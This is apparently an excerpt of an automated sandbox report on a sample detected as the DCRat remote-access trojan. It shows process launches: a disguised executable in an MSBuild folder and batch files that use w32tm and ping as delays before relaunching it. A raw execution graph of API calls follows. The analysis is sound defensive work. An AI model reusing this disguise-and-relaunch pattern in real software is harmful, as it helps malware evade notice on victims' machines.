                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0xa30000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.1875842793.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      Target ID:16
                                      Start time:12:32:16
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:12:32:16
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:12:32:16
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:12:32:16
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:12:32:22
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x890000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:12:32:23
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:12:32:23
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:12:32:23
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:12:32:23
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff7699e0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:12:32:28
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0xb00000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:12:32:29
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:12:32:29
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:12:32:30
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:12:32:30
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:12:32:35
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0xe90000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:12:32:36
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:12:32:36
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:12:32:36
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:12:32:36
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff7ee8d0000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:12:32:46
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x510000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:12:32:47
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:12:32:47
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:12:32:47
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:12:32:48
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:12:32:53
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x950000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:12:32:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:12:32:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:12:32:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:12:32:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:12:32:59
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0xa60000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:12:33:01
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:12:33:01
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:12:33:01
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:12:33:01
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:12:33:06
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x9a0000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:12:33:08
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:12:33:08
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:12:33:08
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:12:33:08
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:12:33:13
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x7c0000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:58
                                      Start time:12:33:15
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:59
                                      Start time:12:33:15
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:60
                                      Start time:12:33:15
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:12:33:15
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:63
                                      Start time:12:33:20
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x660000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:64
                                      Start time:12:33:21
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:65
                                      Start time:12:33:21
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:66
                                      Start time:12:33:22
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                        Execution Graph

                                        Execution Coverage:9.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:9.2%
                                        Total number of Nodes:1504
                                        Total number of Limit Nodes:43
24081->24083 24082->24070 24085 2ee7fb DloadReleaseSectionWriteAccess 6 API calls 24083->24085 24083->24086 24087 2eea7b RaiseException 24085->24087 24099 2ee7fb 24086->24099 24088 2ee5bb ___delayLoadHelper2@8 6 API calls 24087->24088 24089 2eea92 24088->24089 24089->24086 24091 2ee5ed 24090->24091 24092 2ee5c7 24090->24092 24091->24066 24107 2ee664 24092->24107 24094 2ee5cc 24095 2ee5e8 24094->24095 24110 2ee78d 24094->24110 24115 2ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24095->24115 24098 2ee836 24098->24066 24100 2ee82f 24099->24100 24101 2ee80d 24099->24101 24100->24070 24102 2ee664 DloadReleaseSectionWriteAccess 3 API calls 24101->24102 24103 2ee812 24102->24103 24104 2ee82a 24103->24104 24105 2ee78d DloadProtectSection 3 API calls 24103->24105 24118 2ee831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24104->24118 24105->24104 24116 2ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24107->24116 24109 2ee669 24109->24094 24112 2ee7a2 DloadProtectSection 24110->24112 24111 2ee7a8 24111->24095 24112->24111 24113 2ee7dd VirtualProtect 24112->24113 24117 2ee6a3 VirtualQuery GetSystemInfo 24112->24117 24113->24111 24115->24098 24116->24109 24117->24113 24118->24100 25347 2eb18d 78 API calls 25320 2ec793 97 API calls 4 library calls 25364 2ec793 102 API calls 5 library calls 25349 2e9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25322 2fb49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25350 2df1e8 FreeLibrary 24271 2eeae7 24272 2eeaf1 24271->24272 24273 2ee85d ___delayLoadHelper2@8 14 API calls 24272->24273 24274 2eeafe 24273->24274 25324 2ef4e7 29 API calls _abort 24276 2d13e1 84 API calls 2 library calls 24277 2eb7e0 24278 2eb7ea __EH_prolog 24277->24278 24443 2d1316 24278->24443 24281 2ebf0f 24508 2ed69e 24281->24508 24282 2eb82a 24284 2eb841 24282->24284 24285 2eb89b 24282->24285 24286 2eb838 24282->24286 24291 2eb92e GetDlgItemTextW 24285->24291 24296 2eb8b1 
24285->24296 24288 2eb83c 24286->24288 24294 2eb878 24286->24294 24288->24284 24297 2de617 53 API calls 24288->24297 24289 2ebf2a SendMessageW 24290 2ebf38 24289->24290 24292 2ebf52 GetDlgItem SendMessageW 24290->24292 24293 2ebf41 SendDlgItemMessageW 24290->24293 24291->24294 24295 2eb96b 24291->24295 24526 2ea64d GetCurrentDirectoryW 24292->24526 24293->24292 24294->24284 24299 2eb95f KiUserCallbackDispatcher 24294->24299 24300 2eb974 24295->24300 24301 2eb980 GetDlgItem 24295->24301 24302 2de617 53 API calls 24296->24302 24304 2eb85b 24297->24304 24299->24284 24300->24294 24314 2ebe55 24300->24314 24306 2eb9b7 SetFocus 24301->24306 24307 2eb994 SendMessageW SendMessageW 24301->24307 24303 2eb8ce SetDlgItemTextW 24302->24303 24308 2eb8d9 24303->24308 24548 2d124f SHGetMalloc 24304->24548 24305 2ebf82 GetDlgItem 24311 2ebf9f 24305->24311 24312 2ebfa5 SetWindowTextW 24305->24312 24309 2eb9c7 24306->24309 24322 2eb9e0 24306->24322 24307->24306 24308->24284 24316 2eb8e6 GetMessageW 24308->24316 24313 2de617 53 API calls 24309->24313 24311->24312 24527 2eabab GetClassNameW 24312->24527 24317 2eb9d1 24313->24317 24318 2de617 53 API calls 24314->24318 24316->24284 24320 2eb8fd IsDialogMessageW 24316->24320 24549 2ed4d4 24317->24549 24324 2ebe65 SetDlgItemTextW 24318->24324 24320->24308 24327 2eb90c TranslateMessage DispatchMessageW 24320->24327 24329 2de617 53 API calls 24322->24329 24323 2ec1fc SetDlgItemTextW 24323->24284 24328 2ebe79 24324->24328 24327->24308 24330 2de617 53 API calls 24328->24330 24332 2eba17 24329->24332 24365 2ebe9c _wcslen 24330->24365 24331 2ebff0 24336 2ec020 24331->24336 24339 2de617 53 API calls 24331->24339 24337 2d4092 _swprintf 51 API calls 24332->24337 24333 2eb9d9 24453 2da0b1 24333->24453 24335 2ec73f 97 API calls 24335->24331 24345 2ec73f 97 API calls 24336->24345 24386 2ec0d8 24336->24386 24340 2eba29 24337->24340 24344 2ec003 SetDlgItemTextW 24339->24344 24346 2ed4d4 16 API calls 24340->24346 24341 2ec18b 24347 2ec19d 24341->24347 
